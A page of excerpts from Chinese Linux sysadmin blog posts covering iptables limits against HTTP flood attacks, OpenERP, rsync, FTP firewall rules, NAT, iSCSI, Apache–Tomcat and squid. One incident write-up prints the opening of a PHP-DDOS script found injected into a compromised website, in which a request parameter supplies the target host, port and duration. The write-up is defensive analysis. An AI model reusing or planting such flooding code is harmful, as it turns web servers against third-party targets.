iptables限制同一时，同一IP连接数   iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j REJECT#允许单个IP的最大连接数为 30利用 iptables 加上 recent 模块，阻挡大量的请求 新版的 iptables 有个好用简单又有效率的功能，可以设定它阻止瞬间联机太多的来源 IP。这种阻挡功能在某些很受欢迎的，特别像是大型讨论区网站，每个网页都遭到「无知却故意」的人士。一瞬间太多的链接访问，导致服务器呈现呆滞状态。 这时，就需要下列的三行指令： iptables -I INPUT -p tcp --dport 80 -d SERVER_IP -m state --state NEW -m recent --name httpuser --set iptables -A INPUT -m recent --update --name httpuser --seconds 60 --hitcount 9 -j LOG --log-prefix 'HTTP attack: ' iptables -A INPUT -m recent --update --name httpuser --seconds 60 --hitcount 9 -j DROP 其中 SERVER_IP 换上被攻击的服务器 IP。 1.    第一行的意思是：-I，将本规则插入到 INPUT 链里头的最上头。什么样的规则...

iptables限制同一IP连接数 当WEB站点受到严重的cc攻击，我们可以用iptables来防止web服务器被CC攻击，实现自动屏蔽IP的功能。1.系统要求(1) LINUX 内核版本：2.6.9-42ELsmp或2.6.9-55ELsmp(其它内核版本需要重新编译内核，比较麻烦，但是也是可以实现的)。(2) iptables版本：1.3.72. 安装安装iptables1.3.7和系统内核版本对应的内核模块kernel-smp-modules-connlimit3. 配置相应的iptables规则示例如下：(1) 控制单个IP的最大并发连接数iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j REJECT#允许单个IP的最大连接数为 30(2) 控制单个IP在一定的时间(比如60秒)内允许新建立的连接数iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --update --seconds 60 --hitcount 30 -j REJECTiptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --set -j ACCEPT#单个IP在60秒内只允许最多新建30个连接注意:为了增强iptables防止CC攻击的能力，最好调整一下ipt_recent的参数如下：#cat  /etc/modprobe.confoptions ipt_recent ip_list_tot=1000 ip_pkt_list_tot=60#记录1000个IP地址，每个地址记录...

Centos系统搭建OpenERP 遇到问题：近日公司提出openerp的搭建，觉得openerp里的有些模块比较适合公司，openerp的运作，估计会有利于公司系统化的管理。于是我就去了解openrp，然后来搭建这套强大的系统。解决问题：linux下搭建openerp。实验环境：linux系统:centos   我用的是centos 6.2版本                openerp 包：使用的是6.0.3版本。搭建步骤：1．  准备工作1)      网络连通性，因为后续会有许多依赖包需要yum的安装。配置ip地址，dns等，保证可以上网。2)     在此http://www.openerp.com/download/stable/source/下载openerp-server-6.0.3.tar.gz，openerp-web-6.0.3.tar.gz 准备安装包 3)      创建普通用户openerp，（启动openerp-server服务不可以使用root用户）      useradd –s /bin/bash openerp2．    Yum安装依赖软件。（有模块没安装，就会导致后面启动服务的一些错误）yum -y install python.x86_64 yum -y in...

CentOS Rsync服务端与Windows cwRsync客户端实现数据同步 系统环境：CentOS 6.3 rsync服务器          windows server 2003 R2 cwRsync客户端IP地址分别为：10.1.4.44服务器、10.1.4.42客户端 实现目的：cwRsync客户端每天凌晨02:30钟自动同步Rsync服务端/data/share目录中的数据到D:\data目录 所需软件包：rsync-3.0.9.tar.gz   cwRsync_4.0.5_Installer.zip 一、rsync服务器安装rysnc的官方网站：http://rsync.samba.org可以从上面得到最新的版本。目前最新版是3.09。[root@server ~]#  tar xvf  rsync-3.0.9.tar.gz[root@server ~]# cd rsync-3.0.9[root@server rsync-3.0.9]# ./configure --prefix=/usr [root@server rsync-3.0.9]# make[root@server rsync-3.0.9]# make install  注：在用源码包编译安装之前，您得安装gcc等编译开具才行 二、 rsync服务器的配置文件rsyncd.confrsync的主要有以下三个配置文件:rsyncd.conf(主配置文件)rsyncd.secrets(密码文件)rsyncd.motd(rysnc服务器信息) 服务器配置文件(/etc/rsyncd/rsyncd.conf)，该文件默认不存在，...

设置iptables之后不能正常访问ftp解决方法    设置了iptables的禁止所有的端口，只容许可能访问了策略后大部分情况下会出现ftp不能正常访问的问题，因为ftp有主动和被动连接两种模式，少添加一些策略就会出问题。    在这里我就相信的说明下解决方法：   首先加载：#modprobe ip_conntrack_ftp #modprobe ip_nat_ftp然后加载策略#iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT #iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT #iptables -I INPUT -p tcp --dport 21 -j ACCEPT    #iptables -I OUTPUT -p tcp --dport 21 -j ACCEPT 如果不想每次都加载模块的话请在  /etc/sysconfig/iptables-config添加保存之后皆可。

Centos6.3 双网卡NAT 上网与映射内网服务器login as: rootroot@60.190.217.197's password: **********Last login: Mon Mar 18 00:11:47 2013 from 116.208.8.234[root@localhost ~]# iptables -LChain INPUT (policy ACCEPT)target     prot opt source               destinationACCEPT     all  --  anywhere             anywhere            state RELATED,ESTABLISHEDACCEPT     icmp --  anywhere             anywhereACCEPT     all  --  anywhere             anywhereACCEPT     tcp  --  anywhere             anywhere ...

PHP环境（IIS/apache）对外发包的解决方法 前段时间有一些用户的带宽经常跑满，防火墙查看是在向外发包，决定一查究竟。开始以为是系统中毒，但是查毒之后并没有什么异常。后来发现IIS/apache服务停掉之后，就恢复了。于是开始从web服务方面查找原因，最后确认是PHP网站代码被篡改，植入DDOS攻击代码。在网上搜索到了一段PHP-DDOS代码：<?php   set_time_limit(999999);   $host = $_GET['host'];   $port = $_GET['port'];   $exec_time = $_GET['time'];   $Sendlen = 65535;   $packets = 0;   ignore_user_abort(True);   if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){           if (StrLen($_GET['rat'])<>0){                   echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".G...

Centos6.2安装和配置ISCSI服务和客户端 快速增长的存储容量使得企业需要采用网络存储解决方案。目前网络存储技术采用的连接技术主要有光纤通道和TCP／IP。基于IP的网络存储能解决基于光纤 通道的网络存储中存在的兼容性和传输距离问题，而且能提供相对廉价的解决方案。iSCSI协议是IP存储网络协议之一，它将广泛应用的两种工业标准 SCSI和TCP／IP结合起来，为存储设备提供面向数据块级的连接服务。iSCSI（互联网小型计算机系统接口）是一种在TCP/IP上进行数据块传输的标准。它是由Cisco和IBM两家发起的，并且得到了各大存储厂商的大力支持。iSCSI可以实现在IP网络上运行SCSI协议，使其能够在诸如高速千兆以太网上进行快速的数据存取备份操作。iSCSI存储分为服务器端（targets）和客户端（initiators），客户端发送SCSI命令到远程的存储设备端（服务器端），iSCSI使用的是TCP/IP协议，默认使用TCP的3260端口。客户端：-通过discovery程序来请求远程的块设备；-客户端必须安装了iscsi设备驱动器；-要安装iscsi-initiator-utils-*.rpm软件包；服务器端：-发布一个或多个块设备给initiator访问；-从RHEL5.3以后开始支持iSCSI；-需要安装scsi-target-utils-*.rpm软件包；对于每...

利用JK连接Apache与Tomcat，实现负载均衡 整合 Apache Http Server 和 Tomcat 可以提升对静态文件的处理性能、利用 Web 服务器来做负载均衡以及容错、无缝的升级应用程序。首先我们先介绍一下为什么要让 Apache 与 Tomcat 之间进行连接。事实上 Tomcat 本身已经提供了 HTTP 服务，该服务默认的端口是 8080，装好 tomcat 后通过 8080 端口可以直接使用 Tomcat 所运行的应用程序，你也可以将该端口改为 80。既然 Tomcat 本身已经可以提供这样的服务，我们为什么还要引入 Apache 或者其他的一些专门的 HTTP 服务器呢？原因有下面几个：1. 提升对静态文件的处理性能2. 利用 Web 服务器来做负载均衡以及容错3. 无缝的升级应用程序这三点对一个 web 网站来说是非常之重要的，我们希望我们的网站不仅是速度快，而且要稳定，不能因为某个 Tomcat 宕机或者是升级程序导致用户访问不了，而能完成这几个功能的、最好的HTTP服务器也就只有 apache 的 http server 了，它跟 tomcat 的结合是最紧密和可靠的。JK是最常用的Apache与Tomcat的连接方式，最新版本是JK-1.2.37 released，JK 是通过 AJP 协议与 Tomcat 服务器进行通讯的，Tomcat 默认的 AJP Connector 的端口是 8009。JK 本身...

配置squid 反向代理提高网站性能 本文旨在介绍 squid 反向代理的工作原理的基础上，指出反向代理技术在提高网站访问速度，增强网站可用性、安全性方面有很好的用途。现在有许多大型的门户网站都采用 squid 反向代理技术来加速网站的访问速度，可将不同的URL请求分发到后台不同的 WEB 服务器上，同时互联网用户只能看到反向代理服务器的地址，加强了网站的访问安全。本文在具体的实验环境下，利用 DNS 轮询和 Squid 反向代理技术，实现了网站的负载均衡，从而提高了网站的可用性和可靠性。1、什么是反向代理？反向代理服务器又称为 WEB 加速服务器，它位于 WEB 服务器的前端，充当 WEB 服务器的内容缓存器。反向代理服务器是针对 WEB 服务器设置的，后台 WEB 服务器对互联网用户是透明的，用户只能看到反向代理服务器的地址，不清楚后台 WEB 服务器是如何组织架构的。当互联网用户请求 WEB 服务时，DNS 将请求的域名解析为反向代理服务器的 IP 地址，这样 URL 请求将被发送到反向代理服务器，由反向代理服务器负责处理用户的请求与应答、与后台 WEB 服务器交互。利用反向代理服务器减轻了后台 WEB 服务器的负载，提高了访问速度，同时避免了因用户直接与 WEB 服务器通信带...